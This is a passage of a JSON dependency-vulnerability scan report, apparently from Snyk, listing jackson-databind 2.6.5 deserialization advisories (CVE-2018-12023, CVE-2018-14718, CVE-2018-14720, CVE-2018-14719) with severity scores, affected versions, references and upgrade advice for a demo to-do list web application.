"enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2058", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "assigner": "Red Hat", - "severity": 
"medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.092429Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", - "epssDetails": { - "percentile": "0.82708", - "probability": "0.00890", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12023" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6wqp-v4v6-c87c" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:16:09.944095Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:15:50Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2018-10-11T17:15:49Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:43.326081Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.637612Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.92634", - "probability": "0.04626", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14718" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-645p-88qh-w398" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:07.540945Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:19:49Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:19:41Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:22.234808Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - 
"cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.195569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.84205", - "probability": "0.01052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14720" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-x2w5-5m2g-7h5m" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:22.141403Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:20:17Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:19:17Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:33.930153Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", - "title": "GitHub Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - 
"modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.120318Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.85805", - "probability": "0.01269", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14719" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-4gq5-ch57-c2mg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:23:45.326350Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:22:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:22:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.823657Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:46:43.143163Z" - 
